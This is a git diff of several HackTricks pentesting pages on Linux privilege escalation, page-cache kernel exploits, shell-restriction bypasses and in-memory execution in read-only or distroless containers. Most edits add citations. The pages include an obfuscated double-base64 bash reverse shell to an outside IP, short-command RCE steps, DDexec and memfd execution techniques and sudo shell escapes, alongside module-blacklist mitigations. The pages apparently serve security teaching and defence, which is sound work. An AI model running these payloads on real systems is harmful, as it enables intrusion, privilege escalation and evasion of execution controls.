+Some kernel bugs don't modify the file **on disk**. Instead, they let you modify only the **page cache copy** of a readable file. If you can target a **setuid** or otherwise **root-executed** binary, the next execution may run attacker-controlled bytes from memory and escalate privileges even though the file hash on disk is unchanged.<sup>[[3]](#references)[[4]](#references)</sup>
 
-This is useful to think about as a **runtime-only file write primitive**:
+This is useful to think about as a **runtime-only file write primitive**:<sup>[[3]](#references)</sup>
 
 - **Disk stays clean**: the inode and on-disk bytes do not change
 - **Memory is dirty**: processes reading/executing the cached page get the attacker-modified content
 - **Effect is temporary**: the change disappears after reboot or cache eviction
 
-This primitive sits between classic **arbitrary file write** and older **page-cache abuse** bugs such as Dirty COW / Dirty Pipe:
+This primitive sits between classic **arbitrary file write** and older **page-cache abuse** bugs such as Dirty COW / Dirty Pipe:<sup>[[3]](#references)</sup>
 
 - Dirty COW relied on a race
 - Dirty Pipe had write-position constraints
@@ -236,7 +234,7 @@ So the interesting technique is not the CVE itself, but the pattern:
 - make the subsystem **treat them as writable output**
 - trigger a small controlled overwrite in memory
 
-The public PoC used repeated **4-byte writes** to patch `/usr/bin/su` in memory and then executed it.
+The public PoC used repeated **4-byte writes** to patch `/usr/bin/su` in memory and then executed it.<sup>[[4]](#references)[[7]](#references)</sup>
 
 #### ESP / XFRM + netfilter TEE clone example path
 
@@ -261,7 +259,7 @@ Typical exploitation flow:
 5. send the spliced ESP-in-UDP packet so the **TEE clone** reaches `esp_input()` and decrypts **in place**
 6. repeat until the page-cache copy of `/usr/bin/su` or another privileged executable contains attacker-controlled code
 
-Operationally, the impact is the same as the `AF_ALG` example: the file on disk stays clean, but `execve()` consumes the **mutated page-cache bytes** and yields root.
+Operationally, the impact is the same as the `AF_ALG` example: the file on disk stays clean, but `execve()` consumes the **mutated page-cache bytes** and yields root.<sup>[[8]](#references)[[9]](#references)</sup>
 
 Useful exposure checks for this variant:
 
@@ -274,7 +272,7 @@ modprobe -n -v esp6 2>/dev/null
 lsmod | egrep 'xt_TEE|nf_dup_ipv4|esp4|esp6|x_tables'
 ```
 
-Short-term attack-surface reduction is also path-specific here: upgrading to a kernel carrying `48f6a5356a33` fixes the clone path, while blocking `xt_TEE` autoload removes the **flag-laundering step** and blocking `esp4` / `esp6` removes the **decrypt sink**.
+Short-term attack-surface reduction is also path-specific here: upgrading to a kernel carrying `48f6a5356a33` fixes the clone path, while blocking `xt_TEE` autoload removes the **flag-laundering step** and blocking `esp4` / `esp6` removes the **decrypt sink**.<sup>[[8]](#references)[[9]](#references)[[10]](#references)[[11]](#references)</sup>
 
 #### Exposure and hunting
 
@@ -287,26 +285,28 @@ lsmod | grep algif_aead
 find / -perm -4000 -type f 2>/dev/null
 ```
 
+The configuration values below distinguish a loadable interface from one built into the kernel; the crypto build rules map `CONFIG_CRYPTO_USER_API_AEAD` to `algif_aead`.<sup>[[26]](#references)[[27]](#references)</sup>
+
 - `CONFIG_CRYPTO_USER_API_AEAD=m`: `algif_aead` may be loadable/unloadable as a module
 - `CONFIG_CRYPTO_USER_API_AEAD=y`: the interface is built into the kernel
 - setuid binaries are good targets because a page-cache-only patch can be enough to turn a local foothold into root
 
 #### Attack-surface reduction for the `algif_aead` path
 
-If the vulnerable interface is provided by a loadable module:
+If the vulnerable interface is provided by a loadable module:<sup>[[6]](#references)[[28]](#references)[[29]](#references)</sup>
 
 ```bash
 echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
 rmmod algif_aead 2>/dev/null || true
 ```
 
-If it is compiled into the kernel, some disclosures reported blocking the init path with:
+If it is compiled into the kernel, some disclosures reported blocking the init path with:<sup>[[28]](#references)</sup>
 
 ```bash
 initcall_blacklist=algif_aead_init
 ```
 
-This kind of mitigation is worth remembering for other kernel LPEs too: if exploitation depends on a specific optional interface, disabling or blacklisting that interface can break the exploit path even before a full kernel upgrade is available.
+This kind of mitigation is worth remembering for other kernel LPEs too: if exploitation depends on a specific optional interface, disabling or blacklisting that interface can break the exploit path even before a full kernel upgrade is available.<sup>[[6]](#references)[[28]](#references)</sup>
 
 ## References
 
@@ -321,5 +321,23 @@ This kind of mitigation is worth remembering for other kernel LPEs too: if explo
 - [9] [JFrog: Dissecting and Exploiting Linux LPE Variant DirtyClone (CVE-2026-43503)](https://research.jfrog.com/post/dissecting-and-exploiting-linux-lpe-variant-dirtyclone-cve-2026-43503/)
 - [10] [Linux fix: net: skb: preserve `SKBFL_SHARED_FRAG` in `__pskb_copy_fclone()` (`48f6a5356a33`)](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=48f6a5356a33)
 - [11] [Linux earlier mitigation: set `SKBFL_SHARED_FRAG` for spliced UDP packets (`f4c50a4034e6`)](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=f4c50a4034e6)
+- [12] [ld.so(8) — Linux manual page](https://man7.org/linux/man-pages/man8/ld.so.8.html)
+- [13] [Git Hooks](https://git-scm.com/book/en/v2/Customizing-Git-Git-Hooks)
+- [14] [crontab(5) — Linux manual page](https://man7.org/linux/man-pages/man5/crontab.5.html)
+- [15] [run-parts(8) — Debian manual page](https://manpages.debian.org/bookworm/debianutils/run-parts.8.en.html)
+- [16] [systemd.service](https://github.com/systemd/systemd/blob/main/man/systemd.service.xml)
+- [17] [systemd.socket](https://github.com/systemd/systemd/blob/main/man/systemd.socket.xml)
+- [18] [systemd.unit](https://github.com/systemd/systemd/blob/main/man/systemd.unit.xml)
+- [19] [systemd.exec](https://github.com/systemd/systemd/blob/main/man/systemd.exec.xml)
+- [20] [systemd.timer](https://github.com/systemd/systemd/blob/main/man/systemd.timer.xml)
+- [21] [binfmt_misc — The Linux Kernel documentation](https://www.kernel.org/doc/html/latest/admin-guide/binfmt-misc.html)
+- [22] [MIME Applications Associations](https://specifications.freedesktop.org/mime-apps/1.0.1/file.html)
+- [23] [Shared MIME-info specification](https://specifications.freedesktop.org/shared-mime-info/latest-single/)
+- [24] [Desktop Entry specification](https://specifications.freedesktop.org/desktop-entry/latest-single/)
+- [25] [pspy](https://github.com/DominicBreuker/pspy)
+- [26] [Kconfig Language](https://docs.kernel.org/kbuild/kconfig-language.html)
+- [27] [Linux crypto Makefile](https://raw.githubusercontent.com/torvalds/linux/master/crypto/Makefile)
+- [28] [CERT VU#260001: Linux kernel AF_ALG page cache vulnerability](https://kb.cert.org/vuls/id/260001)
+- [29] [modprobe(8) — Linux manual page](https://man7.org/linux/man-pages/man8/modprobe.8.html)
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/linux-hardening/linux-basics/bypass-linux-restrictions/README.md
+++ b/src/linux-hardening/linux-basics/bypass-linux-restrictions/README.md
@@ -1,13 +1,13 @@
 # Bypass Linux Restrictions
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## Common Limitations Bypasses
+
+The command-injection and WAF-evasion collections in PayloadsAllTheThings, Bo0oM's cheat sheet, and the two linked Secjuice articles provide background for the shell-syntax variations in this section.<sup>[[1]](#references)[[2]](#references)[[3]](#references)[[4]](#references)</sup>
 
 ### Reverse Shell
 
 ```bash
-# Double-Base64 is a great way to avoid bad characters like +, works 99% of the time
+# Double-Base64 payload
 echo "echo $(echo 'bash -i >& /dev/tcp/10.10.14.8/4444 0>&1' | base64 | base64)|ba''se''6''4 -''d|ba''se''64 -''d|b''a''s''h" | sed 's/ /${IFS}/g'
 # echo${IFS}WW1GemFDQXRhU0ErSmlBdlpHVjJMM1JqY0M4eE1DNHhNQzR4TkM0NEx6UTBORFFnTUQ0bU1Rbz0K|ba''se''6''4${IFS}-''d|ba''se''64${IFS}-''d|b''a''s''h
 ```
@@ -160,12 +160,12 @@ echo ${PATH:0:1} #/
 
 ### DNS data exfiltration
 
-You could use **burpcollab** or [**pingb**](http://pingb.in) for example.
+For out-of-band callbacks, a collaborator-style service such as Burp Collaborator can induce a target application to interact with an external server; the existing [**pingb**](http://pingb.in) link is retained as historical navigation, not a current availability claim.<sup>[[6]](#references)</sup>
 
 ### Builtins
 
-In case you cannot execute external functions and only have access to a **limited set of builtins to obtain RCE**, there are some handy tricks to do it. Usually you **won't be able to use all** of the **builtins**, so you should **know all your options** to try to bypass the jail. Idea from [**devploit**](https://twitter.com/devploit).\
-First of all check all the [**shell builtins**](https://www.gnu.org/software/bash/manual/html_node/Shell-Builtin-Commands.html)**.** Then here you have some **recommendations**:
+In a restricted shell, the available builtins are the remaining command surface for these examples; Bash documents its builtin commands and execution grammar.<sup>[[7]](#references)</sup> Idea from [**devploit**](https://twitter.com/devploit).\
+Start with the existing [**shell builtins**](https://www.gnu.org/software/bash/manual/html_node/Shell-Builtin-Commands.html) navigation, then try the following Bash-specific techniques:<sup>[[7]](#references)</sup>
 
 ```bash
 # Get list of builtins
@@ -235,6 +235,8 @@ if [ "a" ]; then echo 1; fi # Will print hello!
 
 ### Bashfuscator
 
+The following invocation uses Bashfuscator, an open-source Bash obfuscation framework; the repository link in the code comment is retained as navigation.<sup>[[8]](#references)</sup>
+
 ```bash
 # From https://github.com/Bashfuscator/Bashfuscator
 ./bashfuscator -c 'cat /etc/passwd'
@@ -242,9 +244,11 @@ if [ "a" ]; then echo 1; fi # Will print hello!
 
 ### RCE with 5 chars
 
+The following two historical 5-character examples are retained as challenge reproductions: the primary challenge repository is available at [Orange Tsai’s repository](https://github.com/orangetw/My-CTF-Web-Challenges), while the second write-up link in the code block is navigation whose current availability was not verified.<sup>[[9]](#references)</sup>
+
 ```bash
-# From the Organge Tsai BabyFirst Revenge challenge: https://github.com/orangetw/My-CTF-Web-Challenges#babyfirst-revenge
-#Oragnge Tsai solution
+# From the Orange Tsai BabyFirst Revenge challenge: https://github.com/orangetw/My-CTF-Web-Challenges#babyfirst-revenge
+#Orange Tsai solution
 ## Step 1: generate `ls -t>g` to file "_" to be able to execute ls ordening names by cration date
 http://host/?cmd=>ls\
 http://host/?cmd=ls>_
@@ -328,7 +332,7 @@ ln /f*
 
 ## Read-Only/Noexec/Distroless Bypass
 
-If you are inside a filesystem with the **read-only and noexec protections** or even in a distroless container, there are still ways to **execute arbitrary binaries, even a shell!:**
+If you are inside a filesystem with **read-only and noexec protections**, or in a **distroless image**, the environment imposes execution constraints documented by Linux `mount(8)` and the Distroless project; the linked page collects techniques for working within them.<sup>[[11]](#references)[[12]](#references)</sup>
 
 {{#ref}}
 bypass-fs-protections-read-only-no-exec-distroless/
@@ -342,9 +346,9 @@ bypass-fs-protections-read-only-no-exec-distroless/
 
 ## Space-Based Bash NOP Sled ("Bashsledding")
 
-When a vulnerability lets you partially control an argument that ultimately reaches `system()` or another shell, you may not know the exact offset at which execution starts reading your payload.  Traditional NOP sleds (e.g. `\x90`) do **not** work in shell syntax, but Bash will harmlessly ignore leading whitespace before executing a command.
+When a vulnerability lets you partially control an argument that ultimately reaches `system()` or another shell, the payload offset may be uncertain. Alan Cao and Will Tan describe a constrained embedded-device case where a shell payload was sprayed into memory-mapped NVRAM and prefixed with spaces.<sup>[[5]](#references)</sup>
 
-Therefore you can create a *NOP sled for Bash* by prefixing your real command with a long sequence of spaces or tab characters:<sup>[[5]](#references)</sup>
+Therefore you can create a *NOP sled for Bash* by prefixing your real command with a long sequence of spaces or tab characters; Bash defines spaces and tabs as blanks that separate words in a simple command.<sup>[[5]](#references)[[7]](#references)</sup>
 
 ```bash
 # Payload sprayed into an environment variable / NVRAM entry
@@ -352,15 +356,15 @@ Therefore you can create a *NOP sled for Bash* by prefixing your real command wi
 # 16× spaces ───┘ ↑ real command
 ```
 
-If a ROP chain (or any memory-corruption primitive) lands the instruction pointer anywhere within the space block, the Bash parser simply skips the whitespace until it reaches `nc`, executing your command reliably.
+If a ROP chain (or another memory-corruption primitive) passes a command-string pointer that begins anywhere within the space block, Bash can parse the remaining leading blanks until it reaches the command; in the cited router exploit, this made uncertain string offsets usable.<sup>[[5]](#references)[[7]](#references)</sup>
 
-Practical use cases:
+Practical use cases in constrained embedded targets include:<sup>[[5]](#references)</sup>
 
-1. **Memory-mapped configuration blobs** (e.g. NVRAM) that are accessible across processes.
-2. Situations where the attacker can not write NULL bytes to align the payload.
-3. Embedded devices where only BusyBox `ash`/`sh` is available – they also ignore leading spaces.
+1. **Memory-mapped configuration blobs** (e.g. NVRAM) that are accessible across processes.<sup>[[5]](#references)</sup>
+2. Payload channels where the attacker cannot write NULL bytes to align the payload (a general adaptation of the alignment problem).<sup>[[5]](#references)</sup>
+3. Embedded devices with a small BusyBox `ash`/`sh` environment, which BusyBox documents as applets in resource-constrained systems.<sup>[[10]](#references)</sup>
 
-> 🛠️  Combine this trick with ROP gadgets that call `system()` to dramatically increase exploit reliability on memory-constrained IoT routers.
+> 🛠️  Combine this technique with ROP gadgets that call `system()` in a controlled lab; the cited router research demonstrates this combination on constrained hardware.<sup>[[5]](#references)</sup>
 
 ## References
 
@@ -368,6 +372,13 @@ Practical use cases:
 - [2] [Bo0oM - WAF-bypass-Cheat-Sheet](https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet)
 - [3] [Web Application Firewall (WAF) Evasion Techniques #2 - theMiddle](https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0)
 - [4] [Web Application Firewall (WAF) Evasion Techniques #3 - theMiddle](https://www.secjuice.com/web-application-firewall-waf-evasion/)
-- [5] [Exploiting zero days in abandoned hardware – Trail of Bits blog](https://blog.trailofbits.com/2025/07/25/exploiting-zero-days-in-abandoned-hardware/)
+- [5] [Alan Cao and Will Tan — Exploiting zero days in abandoned hardware – Trail of Bits blog](https://blog.trailofbits.com/2025/07/25/exploiting-zero-days-in-abandoned-hardware/)
+- [6] [Burp Collaborator - PortSwigger](https://portswigger.net/burp/documentation/desktop/tools/collaborator)
+- [7] [bash(1) — Linux manual page](https://man7.org/linux/man-pages/man1/bash.1.html)
+- [8] [Bashfuscator](https://github.com/Bashfuscator/Bashfuscator)
+- [9] [My-CTF-Web-Challenges — Orange Tsai](https://github.com/orangetw/My-CTF-Web-Challenges)
+- [10] [BusyBox](https://busybox.net/downloads/BusyBox.html)
+- [11] [mount(8) — Linux manual page](https://man7.org/linux/man-pages/man8/mount.8.html)
+- [12] [Distroless](https://github.com/GoogleContainerTools/distroless)
 
 {{#include ../../../banners/hacktricks-training.md}}

--- a/src/linux-hardening/linux-basics/bypass-linux-restrictions/bypass-fs-protections-read-only-no-exec-distroless/README.md
+++ b/src/linux-hardening/linux-basics/bypass-linux-restrictions/bypass-fs-protections-read-only-no-exec-distroless/README.md
@@ -1,17 +1,15 @@
 # Bypass FS protections: read-only / no-exec / Distroless
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## Videos
 
 In the following videos you can find the techniques mentioned in this page explained more in depth:<sup>[[1]](#references)[[2]](#references)</sup>
 
-- [**DEF CON 31 - Exploring Linux Memory Manipulation for Stealth and Evasion**](https://www.youtube.com/watch?v=poHirez8jk4)<sup>[[1]](#references)</sup>
-- [**Stealth intrusions with DDexec-ng & in-memory dlopen() - HackTricks Track 2023**](https://www.youtube.com/watch?v=VM_gjjiARaU)<sup>[[2]](#references)</sup>
+- [**DEF CON 31 - Exploring Linux Memory Manipulation for Stealth and Evasion**](https://www.youtube.com/watch?v=poHirez8jk4).<sup>[[1]](#references)</sup>
+- [**Stealth intrusions with DDexec-ng & in-memory dlopen() - HackTricks Track 2023**](https://www.youtube.com/watch?v=VM_gjjiARaU).<sup>[[2]](#references)</sup>
 
 ## read-only / no-exec scenario
 
-It's more and more common to find linux machines mounted with **read-only (ro) file system protection**, specially in containers. This is because to run a container with ro file system is as easy as setting **`readOnlyRootFilesystem: true`** in the `securitycontext`:
+In a container, you can mount the root filesystem as read-only by setting **`readOnlyRootFilesystem: true`** in the security context.<sup>[[3]](#references)</sup> For example:
 
 <pre class="language-yaml"><code class="lang-yaml">apiVersion: v1
 kind: Pod
@@ -26,40 +24,40 @@ spec:
 </strong>    command: ["sh", "-c", "while true; do sleep 1000; done"]
 </code></pre>
 
-However, even if the file system is mounted as ro, **`/dev/shm`** will still be writable, so it's fake we cannot write anything in the disk. However, this folder will be **mounted with no-exec protection**, so if you download a binary here you **won't be able to execute it**.
+A read-only root does not make separately mounted volumes read-only. Docker treats **`/dev/shm`** as an IPC mount, while tmpfs options such as `rw` and `noexec` are runtime configuration choices; inspect the target container's mount options before relying on either behavior.<sup>[[4]](#references)[[5]](#references)</sup>
 
 > [!WARNING]
-> From a red team perspective, this makes **complicated to download and execute** binaries that aren't in the system already (like backdoors o enumerators like `kubectl`).
+> From a red-team perspective, that combination can make it difficult to download and execute binaries that are not already available (for example, backdoors or enumeration tools).<sup>[[4]](#references)[[5]](#references)</sup>
 
 ## Easiest bypass: Scripts
 
-Note that I mentioned binaries, you can **execute any script** as long as the interpreter is inside the machine, like a **shell script** if `sh` is present or a **python** **script** if `python` is installed.
+A `noexec` mount blocks direct execution of binaries on that mount, but an interpreter can still read and interpret a script. If `sh` or `python` is present, you can therefore run a shell or Python script through that interpreter.<sup>[[5]](#references)</sup>
 
-However, this isn't just enough to execute your binary backdoor or other binary tools you might need to run.
+This does not help when the required tool is itself a binary.<sup>[[5]](#references)</sup>
 
 ## Memory Bypasses
 
-If you want to execute a binary but the file system isn't allowing that, the best way to do so is by **executing it from memory**, as the **protections doesn't apply in there**.
+When direct execution from a mounted path is blocked, one option is to load the ELF into memory and execute it through an in-memory path. This avoids the `noexec` check on that mount, but does not remove other kernel, permission, or policy controls.<sup>[[5]](#references)[[6]](#references)</sup>
 
 ### FD + exec syscall bypass
 
-If you have some powerful script engines inside the machine, such as **Python**, **Perl**, or **Ruby** you could download the binary to execute from memory, store it in a memory file descriptor (`create_memfd` syscall), which isn't going to be protected by those protections and then call a **`exec` syscall** indicating the **fd as the file to execute**.
+If a scripting runtime can access the relevant Linux interface, it can create an anonymous, RAM-backed file descriptor with **`memfd_create(2)`**, write the ELF bytes to it, and use an fd-backed execution path. The project [**fileless-elf-exec**](https://github.com/nnsee/fileless-elf-exec) generates compressed and base64-encoded Python, Perl, or Ruby code for this workflow.<sup>[[6]](#references)[[7]](#references)</sup>
 
-For this you can easily use the project [**fileless-elf-exec**](https://github.com/nnsee/fileless-elf-exec). You can pass it a binary and it will generate a script in the indicated language with the **binary compressed and b64 encoded** with the instructions to **decode and decompress it** in a **fd** created calling `create_memfd` syscall and a call to the **exec** syscall to run it.
+The project currently documents Python, Perl, and Ruby targets; PHP or Node need a different runtime-specific technique or extension, so the absence of this generator for a language does not mean that in-memory execution is impossible.<sup>[[6]](#references)[[12]](#references)</sup>
 
 > [!WARNING]
-> This doesn't work in other scripting languages like PHP or Node because they don't have any d**efault way to call raw syscalls** from a script, so it's not possible to call `create_memfd` to create the **memory fd** to store the binary.
+> A regular executable written to **`/dev/shm`** remains subject to that mount's **`noexec`** setting; merely opening it through an ordinary file descriptor does not change the mount policy.<sup>[[5]](#references)</sup>
 >
-> Moreover, creating a **regular fd** with a file in `/dev/shm` won't work, as you won't be allowed to run it because the **no-exec protection** will apply.
+> The exact memory-execution method also depends on the runtime, architecture, kernel, and available permissions.<sup>[[6]](#references)[[7]](#references)[[12]](#references)</sup>
 
 ### DDexec / EverythingExec
 
-[**DDexec / EverythingExec**](https://github.com/arget13/DDexec) is a technique that allows you to **modify the memory your own process** by overwriting its **`/proc/self/mem`**.
+[**DDexec / EverythingExec**](https://github.com/arget13/DDexec) writes a stager and loader into the running shell process through **`/proc/self/mem`**, then transfers control to that code.<sup>[[8]](#references)</sup>
 
-Therefore, **controlling the assembly code** that is being executed by the process, you can write a **shellcode** and "mutate" the process to **execute any arbitrary code**.
+This lets the process load a supplied binary without first placing that binary on an executable filesystem.<sup>[[8]](#references)</sup>
 
 > [!TIP]
-> **DDexec / EverythingExec** will allow you to load and **execute** your own **shellcode** or **any binary** from **memory**.
+> **DDexec / EverythingExec** can load and **execute** shellcode or a binary from **memory**.<sup>[[8]](#references)</sup>
 
 ```bash
 # Basic example
@@ -74,13 +72,13 @@ ddexec.md
 
 ### MemExec
 
-[**Memexec**](https://github.com/arget13/memexec) is the natural next step of DDexec. It's a **DDexec shellcode demonised**, so every time that you want to **run a different binary** you don't need to relaunch DDexec, you can just run memexec shellcode via the DDexec technique and then **communicate with this deamon to pass new binaries to load and run**.
+[**Memexec**](https://github.com/arget13/memexec) is a daemonized DDexec implementation. Its daemon listens for requests containing arguments and raw program bytes, forks a child to load and run each program, and keeps the parent as the server.<sup>[[9]](#references)</sup>
 
-You can find an example on how to use **memexec to execute binaries from a PHP reverse shell** in [https://github.com/arget13/memexec/blob/main/a.php](https://github.com/arget13/memexec/blob/main/a.php).
+The repository includes an example of using **memexec to execute binaries from a PHP reverse shell** in [a.php](https://github.com/arget13/memexec/blob/main/a.php).<sup>[[9]](#references)</sup>
 
 ### Memdlopen
 
-With a similar purpose to DDexec, [**memdlopen**](https://github.com/arget13/memdlopen) technique allows an **easier way to load binaries** in memory to later execute them. It could allow even to load binaries with dependencies.
+With a similar purpose to DDexec, [**memdlopen**](https://github.com/arget13/memdlopen) is a fileless `dlopen()` implementation for a shared object or program. Its README currently documents ARM64 support, so check the target architecture before using it.<sup>[[10]](#references)</sup>
 
 ## Distroless Bypass
 
@@ -92,32 +90,42 @@ For a dedicated explanation of **what distroless actually is**, when it helps, w
 
 ### What is distroless
 
-Distroless containers contain only the **bare minimum components necessary to run a specific application or service**, such as libraries and runtime dependencies, but exclude larger components like a package manager, shell, or system utilities.
+Distroless images contain only the application and its runtime dependencies; the official images omit package managers, shells, and other programs expected in a standard Linux distribution.<sup>[[11]](#references)</sup>
 
-The goal of distroless containers is to **reduce the attack surface of containers by eliminating unnecessary components** and minimising the number of vulnerabilities that can be exploited.
+Keeping the runtime image to those dependencies reduces the software present in production and the amount that must be scanned and tracked.<sup>[[11]](#references)</sup>
 
 ### Reverse Shell
 
-In a distroless container you might **not even find `sh` or `bash`** to get a regular shell. You won't also find binaries such as `ls`, `whoami`, `id`... everything that you usually run in a system.
+In a distroless container you might **not find `sh` or `bash`** for a regular shell, nor common utilities such as `ls`, `whoami`, or `id`.<sup>[[11]](#references)</sup>
 
 > [!WARNING]
-> Therefore, you **won't** be able to get a **reverse shell** or **enumerate** the system as you usually do.
+> Therefore, a usual shell-based reverse shell or utility-based enumeration may not work.<sup>[[11]](#references)</sup>
 
-However, if the compromised container is running for example a flask web, then python is installed, and therefore you can grab a **Python reverse shell**. If it's running node, you can grab a Node rev shell, and the same with mostly any **scripting language**.
-
-> [!TIP]
-> Using the scripting language you could **enumerate the system** using the language capabilities.
-
-If there is **no `read-only/no-exec`** protections you could abuse your reverse shell to **write in the file system your binaries** and **execute** them.
+If the compromised application includes a language runtime (for example, Python for a Flask application or Node.js for a Node application), an RCE may still be able to use that runtime for a command channel and system inspection through its APIs.<sup>[[11]](#references)[[12]](#references)</sup>
 
 > [!TIP]
-> However, in this kind of containers these protections will usually exist, but you could use the **previous memory execution techniques to bypass them**.
+> Use the available scripting language to **enumerate the system** through its language capabilities.<sup>[[12]](#references)</sup>
 
-You can find **examples** on how to **exploit some RCE vulnerabilities** to get scripting languages **reverse shells** and execute binaries from memory in [**https://github.com/carlospolop/DistrolessRCE**](https://github.com/carlospolop/DistrolessRCE).
+If there are no **read-only/no-exec** protections, a command channel may write binaries to a writable, executable mount and run them; verify the mount options and permissions first.<sup>[[4]](#references)[[5]](#references)</sup>
+
+> [!TIP]
+> When these protections are present, use the **memory-execution techniques above** where the runtime, kernel, and permissions allow.<sup>[[6]](#references)[[8]](#references)[[10]](#references)</sup>
+
+You can find **examples** of exploiting RCE vulnerabilities to obtain scripting-language **reverse shells** and execute binaries from memory in [**DistrolessRCE**](https://github.com/carlospolop/DistrolessRCE).<sup>[[12]](#references)</sup>
 
 ## References
 
 - [1] [DEF CON 31 - Exploring Linux Memory Manipulation for Stealth and Evasion](https://www.youtube.com/watch?v=poHirez8jk4)
 - [2] [Stealth intrusions with DDexec-ng & in-memory dlopen() - HackTricks Track 2023](https://www.youtube.com/watch?v=VM_gjjiARaU)
+- [3] [Configure a Security Context for a Pod or Container](https://kubernetes.io/docs/tasks/configure-pod-container/security-context/)
+- [4] [docker container run](https://docs.docker.com/reference/cli/docker/container/run)
+- [5] [mount(8) - Linux manual page](https://man7.org/linux/man-pages/man8/mount.8.html)
+- [6] [fileless-elf-exec](https://github.com/nnsee/fileless-elf-exec)
+- [7] [memfd_create(2) - Linux manual page](https://man7.org/linux/man-pages/man2/memfd_create.2.html)
+- [8] [DDexec](https://github.com/arget13/DDexec)
+- [9] [memexec](https://github.com/arget13/memexec)
+- [10] [memdlopen](https://github.com/arget13/memdlopen)
+- [11] [GoogleContainerTools/distroless](https://github.com/GoogleContainerTools/distroless)
+- [12] [DistrolessRCE](https://github.com/carlospolop/DistrolessRCE)
 
 {{#include ../../../../banners/hacktricks-training.md}}

--- a/src/linux-hardening/linux-basics/bypass-linux-restrictions/bypass-fs-protections-read-only-no-exec-distroless/ddexec.md
+++ b/src/linux-hardening/linux-basics/bypass-linux-restrictions/bypass-fs-protections-read-only-no-exec-distroless/ddexec.md
@@ -1,14 +1,12 @@
 # DDexec / EverythingExec
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## Context
 
 In Linux in order to run a program it must exist as a file, it must be accessible in some way through the file system hierarchy (this is just how `execve()` works). This file may reside on disk or in ram (tmpfs, memfd) but you need a filepath. This has made very easy to control what is run on a Linux system, it makes easy to detect threats and attacker's tools or to prevent them from trying to execute anything of theirs at all (_e. g._ not allowing unprivileged users to place executable files anywhere).
 
 But this technique is here to change all of this. If you can not start the process you want... **then you hijack one already existing**.
 
-This technique allows you to **bypass common protection techniques such as read-only, noexec, file-name whitelisting, hash whitelisting...**<sup>[[1]](#references)</sup>
+This technique allows you to **bypass common protection techniques such as read-only, noexec, file-name whitelisting, hash whitelisting**.<sup>[[1]](#references)</sup>
 
 ## Dependencies
 
@@ -61,7 +59,7 @@ The steps are relatively easy and do not require any kind of expertise to unders
 - Pass the program we want to run to the stdin of the process (will be `read()` by said "shell"code).
 - At this point it is up to the loader to load the necessary libraries for our program and jump into it.
 
-**Check out the tool in** [**https://github.com/arget13/DDexec**](https://github.com/arget13/DDexec)<sup>[[1]](#references)</sup>
+**Check out the tool in** [**https://github.com/arget13/DDexec**](https://github.com/arget13/DDexec).<sup>[[1]](#references)</sup>
 
 ## EverythingExec
 

--- a/src/linux-hardening/linux-basics/linux-environment-variables.md
+++ b/src/linux-hardening/linux-basics/linux-environment-variables.md
@@ -1,7 +1,5 @@
 # Linux Environment Variables
 
-{{#include ../../banners/hacktricks-training.md}}
-
 ## Global variables
 
 The global variables **will be** inherited by **child processes**.
@@ -52,7 +50,7 @@ If you are looking for **credentials** or **interesting service configuration** 
 
 ## Common variables
 
-From: [https://geek-university.com/linux/common-environment-variables/](https://geek-university.com/linux/common-environment-variables/)<sup>[[5]](#references)</sup>
+From: [https://geek-university.com/linux/common-environment-variables/](https://geek-university.com/linux/common-environment-variables/).<sup>[[5]](#references)</sup>
 
 - **DISPLAY** – the display used by **X**. This variable is usually set to **:0.0**, which means the first display on the current computer.
 - **EDITOR** – the user’s preferred text editor.
@@ -209,7 +207,7 @@ EOF
 BASH_ENV=/tmp/pre.sh bash -c 'echo target'
 ```
 
-Bash itself disables these startup files when the **real/effective IDs differ** unless `-p` is used, so the exact behavior depends on how the wrapper invokes the shell. Be careful with privileged wrappers that call `setuid()`/`setgid()` **before** launching Bash: once the IDs match again, Bash may trust `BASH_ENV`, `ENV`, and related shell state that would otherwise be ignored.<sup>[[1]](#references)</sup>
+Bash ignores these startup files when the **real/effective IDs differ**; `-p` preserves the effective ID but does not enable those startup files, so the exact behavior depends on how the wrapper invokes the shell. Be careful with privileged wrappers that call `setuid()`/`setgid()` **before** launching Bash: once the IDs match again, Bash may trust `BASH_ENV`, `ENV`, and related shell state that would otherwise be ignored.<sup>[[1]](#references)</sup>
 
 ### **PYTHONPATH, PYTHONHOME, PYTHONSTARTUP & PYTHONINSPECT**
 

--- a/src/linux-hardening/linux-basics/linux-privilege-escalation/README.md
+++ b/src/linux-hardening/linux-basics/linux-privilege-escalation/README.md
@@ -1,6 +1,6 @@
 # Linux Privilege Escalation
 
-{{#include ../../../banners/hacktricks-training.md}}
+For broader background and historical enumeration workflows, compare the g0tmi1k, Payatu, SANS, LPE Workshop, Linux-Privilege-Escalation, and linux-private-i resources listed in the references.<sup>[[5]](#references)[[6]](#references)[[7]](#references)[[10]](#references)[[11]](#references)[[13]](#references)</sup>
 
 ## System Information
 
@@ -98,7 +98,7 @@ Sudo versions before 1.9.17p1 (**1.9.14 - 1.9.17 < 1.9.17p1**) allows unprivileg
 
 Here is a [PoC](https://github.com/pr0v3rbs/CVE-2025-32463_chwoot) to exploit that [vulnerability](https://nvd.nist.gov/vuln/detail/CVE-2025-32463). Before running the exploit, make sure that your `sudo` version is vulnerable and that it supports the `chroot` feature.  
 
-For more information, refer to the original [vulnerability advisory](https://www.stratascale.com/resource/cve-2025-32463-sudo-chroot-elevation-of-privilege/)<sup>[[28]](#references)</sup>
+For more information, refer to the original [vulnerability advisory](https://www.stratascale.com/resource/cve-2025-32463-sudo-chroot-elevation-of-privilege/).<sup>[[28]](#references)</sup>
 
 ### Sudo host-based rules bypass (CVE-2025-32462)
 
@@ -1227,7 +1227,7 @@ sudo -l #Check commands you can execute with sudo
 find / -perm -4000 2>/dev/null #Find all SUID binaries
 ```
 
-Some **unexpected commands allow you to read and/or write files or even execute a command.**<sup>[[8]](#references)</sup> For example:
+Some **unexpected commands allow you to read and/or write files or even execute a command**.<sup>[[8]](#references)</sup> For example:
 
 ```bash
 sudo awk 'BEGIN {system("/bin/sh")}'
@@ -2223,7 +2223,7 @@ This vulnerability is very similar to [**CVE-2016-1247**](https://www.cvedetails
 
